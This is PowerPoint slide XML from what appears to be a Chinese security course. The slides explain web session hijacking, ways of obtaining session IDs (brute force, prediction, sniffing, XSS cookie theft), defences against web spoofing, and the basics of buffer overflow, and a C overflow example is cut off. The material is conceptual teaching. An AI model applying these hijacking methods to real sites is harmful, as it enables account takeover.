              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>记录会话</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用表单中的隐藏元素记录会话</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话劫持的要点在于，如何获得或者猜测出会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254978" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话劫持</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B5EE5784-4609-4A37-BA98-F386D7AACB39}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>212</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13852060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49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49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49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目标用户登录站点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取站点提供的会话标识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Session ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者通过某种攻击手段捕获</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Session ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Session ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问站点即可获得目标用户合法会话。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击步骤     </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213</a:t>
            </a:fld>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917" y="3861048"/>
            <a:ext cx="3252391" cy="2883639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249923591"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>暴力破解：遍历各种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Session ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>预测：如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Session ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>非随机，可以猜测推算；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>窃取：使用网络嗅探，或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击注入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的方式</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214</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3407464823"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>
  </p:transition>
</p:sld>
</file>

<file path=ppt/slides/slide2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4979" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议不支持会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>无状态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话如何实现？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>记录会话</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用表单中的隐藏元素记录会话</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话劫持的要点在于，如何获得或者猜测出会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254978" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话劫持</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B5EE5784-4609-4A37-BA98-F386D7AACB39}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>215</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18530767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4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49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49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49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normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用类似的域名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注意观察</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址栏的变化</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不要信任不可靠的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络钓鱼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>提高安全意识</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>改写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查看页面的源文本可以发现</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会话劫持</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>养成显式注销的习惯</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用长的会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ID</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256002" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2E416FB0-9842-433C-A660-DA92131C0370}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>216</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17899836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60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60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60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560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60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560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560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560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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>缓冲区溢出攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12290"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62A0558-BA1C-4269-8788-99BCA40AD57B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:pPr/>
              <a:t>217</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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6781800" y="6324600"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1C3D65E1-6F3A-4633-A60C-5385100C907D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>218</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304130" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>缓冲区溢出及基本概念</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>最大的安全威胁之一，大部分网络蠕虫都是利用缓冲区溢出进行攻击、传播。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序用于保存用户输入数据、临时数据的内存空间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>局部变量，保存在（堆）栈中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>预先分配，后存取</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入数据长度超出缓冲区预设大小，而程序不检查</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>超出数据覆盖程序为其它数据分配的内存空间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全意识，假设数据长度与存储空间相匹配</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>历史遗留，压缩程序代码空间</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3041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9550" y="2500306"/>
            <a:ext cx="2584450"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3584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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="304132"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="304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a:xfrm>
            <a:off x="611188" y="0"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>缓冲区溢出示例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1525763" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>, char **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>  { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>     char buffer[16];  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>	 // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
